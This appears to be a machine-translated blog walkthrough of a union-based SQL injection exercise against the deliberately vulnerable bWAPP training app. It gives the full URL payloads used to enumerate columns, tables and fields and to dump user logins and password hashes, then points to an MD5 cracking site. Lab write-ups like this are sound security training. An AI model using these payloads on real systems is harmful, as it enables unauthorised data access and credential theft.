当前位置:网站首页>SQL Injection (GET/Select)
SQL Injection (GET/Select)
2022-07-03 13:32:00 【this is hhhhp】
Choose a little bit , Observe URL, Only movie The value of is changing , and GET/Search Medium title It should be the same
Look at the type
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 or 1=1 &action=go
1. Check the number of fields
http://192.168.3.95/bWAPP/sqli_2.php?movie=1 order by 7 &action=go
2. View displayable fields
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,2,3,4,5,6,7 &action=go
2,3,4,5 Is a displayable field
3. Blast storage
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,database(),3,4,5,6,7 &action=go
Library name :bWAPP
4. Explosion meter
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,table_name,3,4,5,6,7 from information_schema.tables where table_schema=database() &action=go
Found that only burst out 1 Tables
use group_concat() Put the watches together
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(table_name),3,4,5,6,7 from information_schema.tables where table_schema=database() &action=go
This time there is 5 It's a table. , We need to use it. users
5. Pop field
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(column_name),3,4,5,6,7 from information_schema.columns where table_schema=database() and table_name='users'&action=go
We need to use it. login and password
6. Pop field content
http://192.168.3.95/bWAPP/sqli_2.php?movie=-1 union select 1,group_concat(login),group_concat(password),4,5,6,7 from bWAPP.users &action=go
2 individual
7.MD5 Decrypt https://www.cmd5.com/
边栏推荐
- 2022-02-13 plan for next week
- 2022-02-11 heap sorting and recursion
- 编程内功之编程语言众多的原因
- 2022-02-14 analysis of the startup and request processing process of the incluxdb cluster Coordinator
- 物联网毕设 --(STM32f407连接云平台检测数据)
- 【历史上的今天】7 月 3 日:人体工程学标准法案;消费电子领域先驱诞生;育碧发布 Uplay
- Logseq evaluation: advantages, disadvantages, evaluation, learning tutorial
- [today in history] July 3: ergonomic standards act; The birth of pioneers in the field of consumer electronics; Ubisoft releases uplay
- Flink SQL knows why (13): is it difficult to join streams? (next)
- Anan's doubts
猜你喜欢
2022-02-14 incluxdb cluster write data writetoshard parsing
STM32 and motor development (from MCU to architecture design)
Complete deep neural network CNN training with tensorflow to complete picture recognition case 2
(first) the most complete way to become God of Flink SQL in history (full text 180000 words, 138 cases, 42 pictures)
【电脑插入U盘或者内存卡显示无法格式化FAT32如何解决】
Flick SQL knows why (10): everyone uses accumulate window to calculate cumulative indicators
2022-02-11 heap sorting and recursion
The difference between stratifiedkfold (classification) and kfold (regression)
106. 如何提高 SAP UI5 应用路由 url 的可读性
MySQL functions and related cases and exercises
随机推荐
双链笔记 RemNote 综合评测:快速输入、PDF 阅读、间隔重复/记忆
Server coding bug
Start signing up CCF C ³- [email protected] chianxin: Perspective of Russian Ukrainian cyber war - Security confrontation and sanctions g
mysql更新时条件为一查询
Open PHP error prompt under Ubuntu 14.04
阿南的疑惑
Several common optimization methods matlab principle and depth analysis
Realize the recognition and training of CNN images, and process the cifar10 data set and other methods through the tensorflow framework
MapReduce实现矩阵乘法–实现代码
今日睡眠质量记录77分
静态链表(数组的下标代替指针)
Fabric. JS three methods of changing pictures (including changing pictures in the group and caching)
untiy世界边缘的物体阴影闪动,靠近远点的物体阴影正常
JS convert pseudo array to array
Elk note 24 -- replace logstash consumption log with gohangout
Reptile
SwiftUI 开发经验之作为一名程序员需要掌握的五个最有力的原则
Logseq evaluation: advantages, disadvantages, evaluation, learning tutorial
实现CNN图像的识别和训练通过tensorflow框架对cifar10数据集等方法的处理
MySQL functions and related cases and exercises